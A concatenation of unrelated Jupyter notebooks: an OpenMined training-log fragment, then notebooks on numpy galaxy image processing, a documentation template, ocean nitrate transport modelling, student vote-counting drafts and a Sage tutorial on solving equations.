QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod x_train shape: (25000, 400) x_test shape: (25000, 400) Build model...ALREADY SUBSCRIBED TO openmined:task:add:imdb9 listing models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEodQmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod imdb9 QmRJF6noF4RhmkDpkzbzP3KLitMZNHs8mg6vGT8J5zURAt all parts .... ['', 'Users', 'yanndupis', '.openmined'] full path / full path /Users/ full path /Users/yanndupis/ full path /Users/yanndupis/.openmined/ all parts .... ['', 'Users', 'yanndupis', '.openmined', 'grid', 'adapters'] full path / full path /Users/ full path /Users/yanndupis/ full path /Users/yanndupis/.openmined/ full path /Users/yanndupis/.openmined/grid/ full path /Users/yanndupis/.openmined/grid/adapters/ Loading data... 25000 train sequences 25000 test sequences Average train sequence length: 238 Average test sequence length: 230 Pad sequences (samples x time) listing models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod x_train shape: (25000, 400) x_test shape: (25000, 400) Build model... QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod imdb10 QmS1KzjYMx1qjE3EvE3BJYBxjxQfXXrhthxteyqjBZWBFhALREADY SUBSCRIBED TO openmined:task:add:imdb10 listing models QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod QmSgtK1wtG1tmLdn6QoRTYmjnxRsVCHxGvVMwFv7w2vEod all parts .... ['', 'Users', 'yanndupis', '.openmined'] full path / full path /Users/ full path /Users/yanndupis/ full path /Users/yanndupis/.openmined/ all parts .... ['', 'Users', 'yanndupis', '.openmined', 'grid', 'adapters'] full path / full path /Users/ full path /Users/yanndupis/ full path /Users/yanndupis/.openmined/ full path /Users/yanndupis/.openmined/grid/ full path /Users/yanndupis/.openmined/grid/adapters/ Loading data... 25000 train sequences 25000 test sequences Average train sequence length: 238 Average test sequence length: 230 Pad sequences (samples x time) x_train shape: (25000, 400) x_test shape: (25000, 400) Build model...
numpy/Numpy_GalaxyMultiWaveLength_sol.ipynb
###Markdown Galaxy multiWaveLength Analysis using numpyData Source: https://asd.gsfc.nasa.gov Loading the libraries we need ###Code %matplotlib inline import numpy as np import imageio from skimage import color import matplotlib.pyplot as plt import copy from skimage.color import rgb2gray from PIL import Image ###Output _____no_output_____ ###Markdown Creating a numpy array from an image file: load and display each picture from difference wavelength (GammaRay, Xray, Infrared, radio) find the shape of the array, explain each dimensionSample of output:(320, 5760, 3) ###Code photo_xRay = imageio.imread('./multiwavelength/Xray.jpg') fig, ax=plt.subplots(figsize=(18, 4)) ax.imshow(photo_xRay , cmap='gray') print(photo_xRay.shape) plt.imshow(photo_xRay) plt.show() ###Output _____no_output_____ ###Markdown As we have 3 dimensions (RGB)and RGB does not add information, merge all 3 dimensions in a single one using grey scale image using the function rgb2gray Sample of output:(320, 5760) ###Code photo_xRay = imageio.imread('./multiwavelength/Xray.jpg') photo_xRay_grey = color.rgb2gray(photo_xRay) fig, axRay=plt.subplots(figsize=(18, 4)) axRay.imshow(photo_xRay_grey, cmap='gray') print(photo_xRay_grey.shape) photo_radio = imageio.imread('./multiwavelength/Radio.jpg') photo_radio_grey = color.rgb2gray(photo_radio) fig, axRadio=plt.subplots(figsize=(18, 4)) axRadio.imshow(photo_radio_grey, cmap='gray') photo_gammaRay = imageio.imread('./multiwavelength/GammaRay.jpg') photo_gammaRay_grey = color.rgb2gray(photo_gammaRay) fig, axGamma=plt.subplots(figsize=(18, 4)) axGamma.imshow(photo_gammaRay_grey, cmap='gray') ###Output (320, 5760) ###Markdown Merge all 3 waveLength in a single rgb image. Define to which color are linked XRay, Radio and Gamma waveLengthSample of output: ###Code photo_all_band=copy.deepcopy(photo_xRay) photo_all_band[:,:,0]=photo_xRay_grey*255 photo_all_band[:,:,1]=photo_radio_grey*255 photo_all_band[:,:,2]=photo_gammaRay_grey*255 fig, axAll=plt.subplots(figsize=(18, 4)) axAll.imshow(photo_all_band) ###Output _____no_output_____ ###Markdown apply some cleaning to remove noise with value <150Sample of output: ###Code photo_all_band_cleaning_mask=photo_all_band<150 photo_all_band[photo_all_band_cleaning_mask]=0 fig, axFilter=plt.subplots(figsize=(18, 4)) axFilter.imshow(photo_all_band) ###Output _____no_output_____ ###Markdown apply some cleaning to highlight part of the picture where XRay>220, Radio>150, GammaRay>150Sample of output: ###Code photo_all_band_highligt_mask=(photo_all_band[:,:,0]>220)&(photo_all_band[:,:,1]>150)&(photo_all_band[:,:,2]>150) print(photo_all_band_highligt_mask) #photo_all_band[photo_all_band_highligt_mask]=255 plt.imshow(photo_all_band_highligt_mask) photo_all_band_cleaned=copy.deepcopy(photo_all_band) photo_all_band_cleaned[np.logical_not(photo_all_band_highligt_mask)]=0 fig, axHighLight=plt.subplots(figsize=(18, 4)) axHighLight.imshow(photo_all_band_cleaned) ###Output [[False False False ... False False False] [False False False ... False False False] [False False False ... False False False] ... [False False False ... False False False] [False False False ... False False False] [False False False ... False False False]] ###Markdown Only a single part of the picture should be highlighted. Try to find the center of his position using the following mask: ###Code total_rows, total_cols, total_layers = photo_all_band.shape #print("photo_data = ", photo_data.shape) X, Y = np.ogrid[:total_rows, :total_cols] fig = plt.figure() print("X = ", X.shape, " and Y = ", Y.shape) plt.imshow(photo_all_band) plt.show() summ=0 for colPotentialCenter in range(0,total_cols,100): for rowPotentialCenter in range (0,total_rows,100): #print("center_row = ", center_row, "AND center_col = ", center_col) dist_from_potential_center = (X - rowPotentialCenter)**2 + (Y - colPotentialCenter)**2 #print(dist_from_center) radius = 1000 #print("Radius = ", radius) circular_mask = (dist_from_potential_center > radius) #print(circular_mask[1500:1550,2000:2200]) #photo_all_band_filtered[np.logical_not(circular_mask)] = 255 if (photo_all_band[np.logical_not(circular_mask)].sum()>summ): summ=photo_all_band[np.logical_not(circular_mask)].sum() centerOfBurstrowID=rowPotentialCenter centerOfBurstcolID= colPotentialCenter plt.show() #print("center X = ", centerOfBurstrowID, " and center Y = ", centerOfBurstcolID) fig, axCircular=plt.subplots(figsize=(18, 4)) axCircular.imshow(photo_all_band) axCircular.vlines(centerOfBurstcolID,0,total_rows,colors='w') axCircular.hlines(centerOfBurstrowID,0,total_cols,colors='w') ###Output X = (320, 1) and Y = (1, 5760)
book/community/templates/template-environments-postprocessing.ipynb
###Markdown [Post-processing pipeline/dataset name]:::{eval-rst}:opticon:`tag`:badge:`[Environment],badge-primary`:badge:`Post-processing,badge-secondary`::: Context Purpose*Describe the purpose of the use case.* Post-processing approach*Describe the most relevant features of the post-processing pipeline.* Highlights*Provide 3-5 bullet points that convey the use case’s core procedures. Each bullet point must have a maximum of 85 characters, including spaces.** Highlight 1* Highlight 2 Contributions NotebookAuthor (role), Affiliation, GitHub alias Post-processing codebaseAuthor (role), Affiliation, GitHub alias Post-processing publications```{bibliography} :style: plain :list: bullet :filter: topic % "replace by the `topic` entry linked to the publication(s) in the `_bibliography/references.bib` file"``` Post-processing fundingIndicate details of the funding.:::{note}*Optional: add credits or acknowledgements to data providers or authors of code snippets*::: Install and load libraries*For installation, add only libraries not listed in the [environment.yml](https://github.com/alan-turing-institute/environmental-ds-book/blob/master/environment.yml) file, but required by the notebook. Libraries can be installed in silent mode e.g. `pip -q install `**For loading libraries, order them according to their role e.g. libraries to manipulate folders i.e. os (first), handle data i.e. numpy, xarray (second), visualisation e.g. holoviews (third), etc. The cell below contains two libraries, `os` and `warning` which are common among the notebooks. Don't remove them.* ###Code import os import warnings warnings.filterwarnings(action='ignore') ###Output _____no_output_____ ###Markdown Set project structure*The cell below creates a separate folder to save the notebook outputs. This facilitates the reader to inspect inputs/outputs stored within a defined destination folder. Change `` with your notebook identifier.* ###Code notebook_folder = '../postprocessing/<replace-by-notebook-filename>' if not os.path.exists(notebook_folder): os.makedirs(notebook_folder) ###Output _____no_output_____ ###Markdown Load data*Load full dataset from original or mirror sources. If the license of the dataset permits, we suggest creating sample data (preprocessed) for the notebook stored in a data repository e.g. Zenodo.* Preprocessing*Add code demonstrating the post-processing pipeline.* Outputs*Provide a brief inspection of the post-processing outputs and their interpretation* Summary*Provide 3-5 bullet points summarising the main aspects of the post-processing and tools covered in the notebook.* * Sentence 1 e.g. `tool-name` to perform...* Sentence 2 e.g. `tool-name` to perform... Additional information**License**: The code in this notebook is licensed under the MIT License. The Environmental Data Science book is licensed under the Creative Commons by Attribution 4.0 license. See further details [here](https://github.com/alan-turing-institute/environmental-ds-book/blob/master/LICENSE.md).**Contact**: If you have any suggestion or report an issue with this notebook, feel free to [create an issue](https://github.com/alan-turing-institute/environmental-ds-book/issues/new/choose) or send a direct message to [[email protected]](mailto:[email protected]). ###Code from datetime import date print(f'Last tested: {date.today()}') ###Output _____no_output_____
notebooks/revisions/transportsUpper6-WithArrowsAndV-noMRub.ipynb
###Markdown 6 m is mean nitricline depth and just below 10% light level ###Code import matplotlib.pyplot as plt import netCDF4 as nc import numpy as np import os import glob import datetime as dt from salishsea_tools import viz_tools from matplotlib.ticker import FormatStrFormatter import cmocean from salishsea_tools import viz_tools, evaltools as et import NorthNut as nn import matplotlib.gridspec as gridspec import pickle import matplotlib as mpl import matplotlib.patheffects as path_effects mpl.rc('xtick', labelsize=8) mpl.rc('ytick', labelsize=8) mpl.rc('legend', fontsize=8) mpl.rc('axes', titlesize=8) mpl.rc('axes', labelsize=8) mpl.rc('figure', titlesize=8) mpl.rc('font', size=8) mpl.rc('text', usetex=True) mpl.rc('text.latex', preamble = r''' \usepackage{txfonts} \usepackage{lmodern} ''') mpl.rc('font', family='sans-serif', weight='normal', style='normal') from pandas.plotting import register_matplotlib_converters register_matplotlib_converters() %matplotlib inline ig0=nn.ig0 ig1=nn.ig1 jg0=nn.jg0 jg1=nn.jg1 tmask=nn.tmask umask=nn.umask vmask=nn.vmask umask0=nn.umask0 vmask0=nn.vmask0 boxCol=nn.boxCol colL=nn.colL colR=nn.colR e12t=nn.e12t k=6 #depth presented here k1=30 # max depth to do calcs to start=dt.datetime(2015,5,15) # originally 5/15-8/15, but changed to even number of fortnights (6, end is included) end=dt.datetime(2015,8,20) mod_basedir='/data/eolson/results/MEOPAR/SS36runs/CedarRuns/rev_noMrubrum/' mod_nam_fmt='long' mod_flen=10 saveloc='/data/eolson/results/MEOPAR/SS36runs/calcFiles/NTransport/' fver='noMrubrum' ###Output _____no_output_____ ###Markdown made interval a multiple of a fortnight in attempt to minimize aliasing of tidal cycle: ###Code dt.datetime(2015,5,15)+dt.timedelta(days=7*14) # calc transports: boxes in full model coords boxes,boxesS=nn.defboxes(k) np.mean(nn.e1t[boxesS[4]['j'][1],boxesS[4]['i'][0]:boxesS[4]['i'][1]]) np.sum(tmask[6,boxesS[4]['j'][1],(boxesS[4]['i'][0]):(boxesS[4]['i'][1])])*427*7/1e6 np.sum(nn.e3t_0[:7,boxesS[4]['j'][1],boxesS[4]['i'][0]:boxesS[4]['i'][1]],0) np.diff(np.array(([boxes[0]['j'][1]]+[boxes[el]['j'][0] for el in range(0,6)]))) fig,ax=plt.subplots(1,1,figsize=(3,5)) viz_tools.set_aspect(ax) ax.pcolormesh(nn.vmask0) ax.pcolormesh(nn.tmask[0,:,:]) #ax.contour(tmask[k,:,:],[.5]) ax.contour(tmask[0,:,:],[.5]) for el in boxes.keys(): iii,jjj=nn.makebox(nn.boxcoordsT(boxes[el])) ax.plot(iii-ig0,jjj-jg0,'-',color='w',linewidth=1) flistV=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'dian_V',1) flistU=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'dian_U',1) flistW=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'dian_W',1) #flistC=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'carp_T',1) flistT=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'ptrc_T',1) #flistP=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'grid_T',1) #flistGV=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'grid_V',1) #flistGU=et.index_model_files(start,end,mod_basedir,mod_nam_fmt,mod_flen,'grid_U',1) flistT.loc[0,['t_0']].values[0] flistT.loc[len(flistT)-1,['t_n']].values[0]-dt.timedelta(days=1) end NBound, SBound, EBound, BBound, NBoundMix, SBoundMix, EBoundMix, BBoundMix, times, boxes = nn.calcTranspsReduced( start,end,k1,mod_flen,fver,saveloc,boxes,boxesS,flistV,flistU,flistW,flistT,recalc=False) # vertical transport into 4th box np.shape(BBound[3]) ###Output _____no_output_____ ###Markdown NO3_VT v*dx*dz*C = mmol N/s NO3_UT u*dy*dz*C = m/s*m2*mmol/m3 = mmol N/s VLDFNO3 dC/dt= (F1-F0)/(dx*dy*dz) => F in mmol N/s ULDFNO3 mmol N/sNO3_WT w*dx*dy*C = mmol N/sVMIXNO3 ~(Cadz-Cbdz)/dt=mmol/m3*1/s*m = mmol N/m2/s ###Code mapCol=(0.67, 0.8, 0.64) # rgb cmb=cmocean.tools.crop_by_percent(cmocean.cm.balance, 45, which='both', N=None) cmb.set_bad(mapCol) cmc=cmocean.tools.crop_by_percent(cmocean.cm.tarn_r, 40, which='both', N=None) cmc.set_bad(mapCol) for el in BBound.keys(): print(el,np.mean(np.sum(BBound[el][:,:k]+BBoundMix[el][:,:k],1))*1e-3) ###Output 0 91.90835155323016 1 86.66483786685788 2 -109.28906201525717 3 61.488358886550685 4 -2.486394686184514 5 47.570619286285726 ###Markdown Sum of vertical mixing and transport NO3 supply to region in boxes: ###Code np.mean(np.sum(BBound[0][:,:k]+BBoundMix[0][:,:k]+\ BBound[1][:,:k]+BBoundMix[1][:,:k]+\ BBound[2][:,:k]+BBoundMix[2][:,:k]+\ BBound[3][:,:k]+BBoundMix[3][:,:k]+\ BBound[4][:,:k]+BBoundMix[4][:,:k]+\ BBound[5][:,:k]+BBoundMix[5][:,:k],1))*1e-3 ###Output _____no_output_____ ###Markdown Divide by area: ###Code ABoxes=nn.boxAreas(k) # units are umol/m2/s Asum=ABoxes[0]+ABoxes[1]+ABoxes[2]+ABoxes[3]+ABoxes[4]+ABoxes[5] np.mean(np.sum(BBound[0][:,:k]+BBoundMix[0][:,:k]+\ BBound[1][:,:k]+BBoundMix[1][:,:k]+\ BBound[2][:,:k]+BBoundMix[2][:,:k]+\ BBound[3][:,:k]+BBoundMix[3][:,:k]+\ BBound[4][:,:k]+BBoundMix[4][:,:k]+\ BBound[5][:,:k]+BBoundMix[5][:,:k],1))/Asum*1e3 NBoundC, SBoundC, EBoundC, BBoundC, NBoundMixC, SBoundMixC, EBoundMixC, BBoundMixC = \ nn.transpConversions(boxes,NBound,SBound,EBound,BBound,NBoundMix,SBoundMix,EBoundMix,BBoundMix,k) BBoundC mask=dict() mask['V']=vmask0 mask['U']=umask0 mask['W']=tmask[k,:,:] fig=plt.figure(figsize=(7.5,5.2)) gs0=gridspec.GridSpec(2,2,hspace=0.24,wspace=.13,left=.01,right=.93,bottom=.022,top=.92, width_ratios=[1,1],height_ratios=[1,1]) ax=list() cbax=list() for jx in range(0,2): if jx==0: gsi=gridspec.GridSpecFromSubplotSpec(1, 3, subplot_spec=gs0[0,jx], width_ratios=[10,10*(ig1-ig0-.5)/(ig1-ig0+13),11-10*(ig1-ig0-.5)/(ig1-ig0+13)],wspace=.1) gsl=gridspec.GridSpecFromSubplotSpec(1, 3, subplot_spec=gs0[1,jx], width_ratios=[10,10,1],wspace=.1) elif jx==1: gsi=gridspec.GridSpecFromSubplotSpec(1, 3, subplot_spec=gs0[0,jx], width_ratios=[10,10,1],wspace=.1) gsl2=gridspec.GridSpecFromSubplotSpec(1, 3, subplot_spec=gs0[1,jx], width_ratios=[10,10,1],wspace=.1) ax1=fig.add_subplot(gsi[0]) ax1.get_xaxis().set_visible(False) ax1.get_yaxis().set_visible(False) viz_tools.set_aspect(ax1) ax2=fig.add_subplot(gsi[1]) ax2.get_xaxis().set_visible(False) ax2.get_yaxis().set_visible(False) viz_tools.set_aspect(ax2) ax3=fig.add_subplot(gsi[2]) ax.append(ax1,) ax.append(ax2,) cbax.append(ax3,) ax4=fig.add_subplot(gsl2[0]) ax4.get_xaxis().set_visible(False) ax4.get_yaxis().set_visible(False) viz_tools.set_aspect(ax4) ax5=fig.add_subplot(gsl2[1]) ax5.get_xaxis().set_visible(False) ax5.get_yaxis().set_visible(False) viz_tools.set_aspect(ax5) ax6=fig.add_subplot(gsl2[2]) ax7=fig.add_subplot(gsl[0]) viz_tools.set_aspect(ax7) ax9=fig.add_subplot(gsl[2]) ax.append(ax4,) ax.append(ax5,) ax.append(ax7,) cbax.append(ax6,) cbax.append(ax9,) v1=3000 m=ax[0].pcolormesh(mask['V'],cmap=cmb) ax[0].set_title('Northward NO$_3$\nFlux ($\muup$mol Nm$^{-2}$s$^{-1}$)\nAdvection + Mixing') m=ax[1].pcolormesh(mask['U'],cmap=cmb) cb0=fig.colorbar(m,cax=cbax[0]) ax[1].set_title('Eastward NO$_3$\nFlux ($\muup$mol Nm$^{-2}$s$^{-1}$)\nAdvection + Mixing') v2=15 m=ax[2].pcolormesh(mask['W'],cmap=cmc) ax[2].set_title('Vertical NO$_3$\nFlux ($\muup$mol Nm$^{-2}$s$^{-1}$)\nAdvection') m=ax[3].pcolormesh(mask['W'],cmap=cmc) cb1=fig.colorbar(m,cax=cbax[1]) ax[3].set_title('Vertical NO$_3$\nFlux ($\muup$mol Nm$^{-2}$s$^{-1}$)\nMixing') nn.drawboxesV(ax[0],boxes,boxCol) nn.drawboxesU(ax[1],boxes,boxCol) nn.drawboxesT(ax[2],boxes,boxCol) nn.drawboxesT(ax[3],boxes,boxCol) for iax in ax: iax.set_facecolor(mapCol) ax[0].set_xlim(-13,ig1-ig0) ax[1].set_xlim(0,ig1-ig0-.5) ax[2].set_xlim(-13,ig1-ig0) ax[3].set_xlim(-13,ig1-ig0) ax[0].set_ylim(.5,jg1-jg0-.5) ax[1].set_ylim(1,jg1-jg0) ax[2].set_ylim(1,jg1-jg0) ax[3].set_ylim(1,jg1-jg0) nn.annotYTranspUpper(ax[0],boxes,NBoundC,SBoundC,NBoundMixC,SBoundMixC) nn.annotXTranspUpper(ax[1],boxes,EBoundC,EBoundMixC) nn.annotWTTranspUpper(ax[2],boxes,BBoundC) nn.annotWMTranspUpper(ax[3],boxes,BBoundMixC) x1=ax[1].get_position() xc1=cbax[0].get_position() cbax[0].set_position(mpl.transforms.Bbox.from_bounds(xc1.bounds[0],x1.bounds[1],.015,x1.bounds[3])) x2=ax[3].get_position() xc2=cbax[1].get_position() cbax[1].set_position(mpl.transforms.Bbox.from_bounds(xc2.bounds[0],x2.bounds[1],.015,x2.bounds[3])) fig.canvas.draw() #fig.savefig('/data/eolson/results/MEOPAR/biomodelevalpaper/figsNNut/Ntransports0_k'+str(k)+'.png',dpi=300) ###Output _____no_output_____
.ipynb_checkpoints/counting_election_votes_analysis-checkpoint.ipynb
###Markdown Counting Election Votes ###Code # Import Dependencies import os import csv # Set the File Path filepath = os.path.join(".","resources","election_data_test.csv") output_file = os.path.join(".", "votes.txt") ###Output _____no_output_____ ###Markdown Draft 1 ###Code # Count all election votes in 2 loops with open(filepath, newline='') as csvfile: csvreader = csv.reader(csvfile, delimiter=',') header = next(csvreader) #print(header) total_votes = [] for candidate_name in csvreader: total_votes.append(candidate_name[2]) print(candidate_name[2]) votes_dict = {candidate:total_votes.count(candidate) for candidate in total_votes} output=( print("Election Results") print(f"Total Votes: {len(candidate_votes}") print(votes_dict) print(f"{votes_dict['Khan']/len(candidate_votes)}% ({votes_dict['Khan']}) print(f"{votes_dict['Correy']/len(candidate_votes)}% ({votes_dict['Correy']}) print(f"{votes_dict['Li']/len(candidate_votes)}% ({votes_dict['Li']})) with open(output_file, 'w') as txt_file: txt_file.write(output) ###Output _____no_output_____ ###Markdown Draft 2 ###Code # Short List Test - DRAFT import os import csv filepath2 = os.path.join(".","election_data_test.csv") output_file = os.path.join(".", "votes_test2.txt") with open(filepath2, newline='') as csvfile2: csvreader2 = csv.reader(csvfile2, delimiter=',') header2 = next(csvreader2) #print(header2) votes = [] for candidate_name in csvreader2: votes.append(candidate_name[2]) #print(votes) votes_dict = {candidate:votes.count(candidate) for candidate in votes} ############################# # WRONG PLACEMENT # #output = (print(votes_dict)) otooley = "O'Tooley" print("Election Results") print(f"Total Votes: {len(votes)}") #print(votes_dict) print(f"Khan: {round((votes_dict['Khan']/len(votes))*100, 2)}% ({votes_dict['Khan']}) ") print(f"Correy: {round((votes_dict['Correy']/len(votes))*100, 2)}% ({votes_dict['Correy']}) ") print(f"Li: {round((votes_dict['Li']/len(votes))*100, 2)}% ({votes_dict['Li']}) ") print(f"O'Tooley: {round((votes_dict[otooley]/len(votes))*100, 2)}% ({votes_dict[otooley]})" ) ######################################################## maximum_vote = 0 winner_name = [] for key, value in votes_dict.items(): if value > maximum_vote: maximum_vote = value winner_name.append(key) #print(winner_name[0]) #print(maximum_vote) print(f"Winner: {winner_name[0]}") #with open(output_file, 'w') as txt_file: # txt_file.write(output) ###Output _____no_output_____ ###Markdown FINAL ###Code # JG's ANSWER!!! - FINAL FINAL FINFAL import os import csv #filepath2 = os.path.join(".","election_data.csv") filepath2 = os.path.join(".","election_data_test.csv") output_file = os.path.join(".", "pypoll_votes_final.txt") with open(filepath2, newline='') as csvfile2: csvreader2 = csv.reader(csvfile2, delimiter=',') header2 = next(csvreader2) #print(header2) votes = [] for candidate_name in csvreader2: votes.append(candidate_name[2]) #print(votes) votes_dict = {candidate:votes.count(candidate) for candidate in votes} print("Done running") #output = (print(votes_dict)) maximum_vote = 0 winner_name = [] for key, value in votes_dict.items(): if value > maximum_vote: maximum_vote = value winner_name.append(key) #print(winner_name[0]) #print(maximum_vote) #print(f"Winner: {winner_name[0]}") print(votes_dict) otooley = "O'Tooley" output = ( f"Election Results\n" f"Total Votes: {len(votes)}\n" f"Khan: {round((votes_dict['Khan']/len(votes))*100, 2)}% ({votes_dict['Khan']})\n" f"Correy: {round((votes_dict['Correy']/len(votes))*100, 2)}% ({votes_dict['Correy']})\n" f"Li: {round((votes_dict['Li']/len(votes))*100, 2)}% ({votes_dict['Li']})\n" f"O'Tooley: {round((votes_dict[otooley]/len(votes))*100, 2)}% ({votes_dict[otooley]})\n" f"Winner: {winner_name[0]}\n" ) with open(output_file, 'w') as txt_file: txt_file.write(output) print("Execution Completed") ###Output _____no_output_____ ###Markdown Answer 2: using 3 loops ###Code import os import csv filepath = os.path.join('.', "election_data_test.csv") with open(filepath, newline="") as csvfile3: csvreader3 = csv.reader(csvfile3, delimiter=',') # print to see each row #for row in csvreader3: #print(row) header3 = next(csvreader3) votes = [] # segregrate the votes into a seperate list for vote in csvreader3: votes.append(vote[2]) #print(votes) vote_dict2 = {} for candidate in votes: if candidate not in vote_dict2: vote_dict2[candidate] = 0 #vote_dict2[candidate] += 1 if candidate in vote_dict2: vote_dict2[candidate] += 1 print(vote_dict2) winner = ["", 0] for key, value in vote_dict2.items(): #print(key, value) if value > winner[1]: winner[1] = value winner[0] = key print(winner) 324 + 114 + 56 + 10 ###Output _____no_output_____ ###Markdown Play Cell for teaching ###Code # votes = [] # for candidate_name in csvreader2: # votes.append(candidate_name[2]) import os import csv #filepath2 = os.path.join(".","election_data.csv") filepath2 = os.path.join(".","election_data_test.csv") output_file = os.path.join(".", "pypoll_votes_final.txt") with open(filepath2, newline='') as csvfile2: csvreader2 = csv.reader(csvfile2, delimiter=',') header2 = next(csvreader2) #print(header2) votes2 = [candidate_name[2] for candidate_name in csvreader2] print(votes2) otooley = "O'Tooley" print(otooley) # Example pulled from Stackoverflow # votes = ['apple','red','apple','red','red','pear'] # d = {candidate:votes.count(candidate) for candidate in votes} # print(d) # -*- coding: UTF-8 -*- """PyPoll Homework Solution.""" # Incorporated the csv module import csv import os # Files to load and output (Remember to change these) file_to_load = os.path.join("election_data.csv") #file_to_output = os.path.join("analysis", "election_analysis.txt") # Total Vote Counter total_votes = 0 # Candidate Options and Vote Counters candidate_options = [] candidate_votes = {} # Winning Candidate and Winning Count Tracker winning_candidate = "" winning_count = 0 # Read the csv and convert it into a list of dictionaries with open(file_to_load) as election_data: reader = csv.reader(election_data) # Read the header header = next(reader) # For each row... for row in reader: # Run the loader animation #print(". ", end=""), # Add to the total vote count total_votes = total_votes + 1 # Extract the candidate name from each row candidate_name = row[2] # If the candidate does not match any existing candidate... # (In a way, our loop is "discovering" candidates as it goes) if candidate_name not in candidate_options: # Add it to the list of candidates in the running candidate_options.append(candidate_name) # And begin tracking that candidate's voter count candidate_votes[candidate_name] = 0 # Then add a vote to that candidate's count candidate_votes[candidate_name] = candidate_votes[candidate_name] + 1 # Print the results and export the data to our text file with open(file_to_output, "w") as txt_file: # Print the final vote count (to terminal) election_results = ( f"\n\nElection Results\n" f"-------------------------\n" f"Total Votes: {total_votes}\n" f"-------------------------\n") print(election_results, end="") # Save the final vote count to the text file txt_file.write(election_results) # Determine the winner by looping through the counts for candidate in candidate_votes: # Retrieve vote count and percentage votes = candidate_votes.get(candidate) vote_percentage = float(votes) / float(total_votes) * 100 # Determine winning vote count and candidate if (votes > winning_count): winning_count = votes winning_candidate = candidate # Print each candidate's voter count and percentage (to terminal) voter_output = f"{candidate}: {vote_percentage:.3f}% ({votes})\n" print(voter_output, end="") # Save each candidate's voter count and percentage to text file txt_file.write(voter_output) # Print the winning candidate (to terminal) winning_candidate_summary = ( f"-------------------------\n" f"Winner: {winning_candidate}\n" f"-------------------------\n") print(winning_candidate_summary) # Save the winning candidate's name to the text file txt_file.write(winning_candidate_summary) ###Output _____no_output_____
src/Lecture6/notebook/.ipynb_checkpoints/8-SageCalculus-modified-checkpoint.ipynb
###Markdown Symbolic expressions**Reference:** [[1](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/expression.html)]Last time we saw the basics of symbolic expressions:* How to define and manipulate symbolic expressions* How to introduce new variables (in the Mathematical sense) with `var()`* How to solve equations and inequalities* Some of the Mathematical constants that are included in Sage, and how to approximate them using `n()`Here are some examples to remind you of these basic things: ###Code var('y', 'z') # Define new variables (x is already defined by Sage) f = x^2 + pi g = y^2 + y - 2 > 0 print( solve(f==0, x) ) print( solve(z^2 - f, z) ) print( solve(g, y) ) print( 2*pi + e, "is approximately", n(2*pi + e) ) ###Output [ x == -sqrt(-pi), x == sqrt(-pi) ] [ z == -sqrt(pi + x^2), z == sqrt(pi + x^2) ] [[y < -2], [y > 1]] 2*pi + e is approximately 9.00146713563863 ###Markdown Now we will see some more details about solving equations and manipulating their solutions. Solving equations and inequalities**Reference** [[1](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/expression.html)] for the details of `solve()` and `find_root()`, [[2](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/relation.htmlsolving)] for examples.Other than equations and inequalities, we can also solve systems: it is enough to give Sage a list of expressions and a list of variables with respect to which we want to solve. For example the system\begin{align*} \begin{cases} x + y = 2 \\ 2x - y = 6 \end{cases}\end{align*}Can be solved as ###Code solve([x+y == 2, 2*x - y == 6], [x,y]) ###Output _____no_output_____ ###Markdown **Exercise.** Find the intersection of the circle of radius $2$ centered in the origin and the parabula of equation $y=x^2-2x+1$. **Solution:** the system is\begin{align*} \begin{cases} y^2 = x^2 - 2x +1\\ x^2 + y^2 = 4 \end{cases}\end{align*} ###Code var('y') eq1 = y^2 == x^2-2*x+1 eq2 = x^2 + y^2 == 4 solve([eq1, eq2], [x,y]) ###Output _____no_output_____ ###Markdown The set of solutionsOne would expect the result of `solve()` to be a list of solutions, but it is actually a list of expressions (technically it is not a list but a different type of Python collection, but this is not so important) ###Code solutions = solve(x^2-9 == 0, x) solutions[0] # This is the expression 'x == -3' # Using rhs() explained below print(solutions[0].rhs()) ###Output -3 ###Markdown To read the actual solution without the `x ==` part you can use the `rhs()` or `lhs()` functions, which can be applied to any expression containing a relation operator (like `==`, `=`...) and return the *right hand side* and *left hand side* of the expression, respectively ###Code f = x^2+y <= 2-y print("rhs:", f.rhs()) print("lhs:", f.lhs()) ###Output rhs: -y + 2 lhs: x^2 + y ###Markdown When you solve an inequality or a system, the set of solutions can be more complicated to describe. In this case the result is a list containing lists of expressions that have to be `True` at the same time. It is easier to explain with an example: ###Code print("Simple inequality:", solve(x^2-9 > 0, x)) print("System of inequalities:\n", solve([x^2-9 > 0, x < 6], x)) ###Output Simple inequality: [[x < -3], [x > 3]] System of inequalities: [ [3 < x, x < 6], [x < -3] ] ###Markdown In the last example (system of inequalities), Sage is telling us that the system\begin{align*} \begin{cases} x^2-9 > 9 \\ x < 6 \end{cases}\end{align*}has two solutions:* $x$ is between $3$ and $6$;* $x$ is less than $-3$.Since in Sage (and in Python) expressions can have at most on relational operator like `<`, the first solution requires two expressions to be described. Hence the "list of lists". **Exercise.** In the first exercise you were asked to solve a system of equations, but some of its solutions were complex numbers. Select only the real solutions and print them as pairs $(x,y)$. ###Code # We use a different equation because the first exercise only # had real solutions. var('y') eq1 = y^2 == x^2-2*x+5 eq2 = x^2 + y^2 == 4 solutions = solve([eq1, eq2], [x,y]) print("All solutions:") print(solutions) for s in solutions: #print("One solutions is:", s) x0 = s[0].rhs() y0 = s[1].rhs() if x0 in RR and y0 in RR: print((x0, y0)) ###Output All solutions: [ [x == (-1/2*I + 1/2), y == -sqrt(1/2*I + 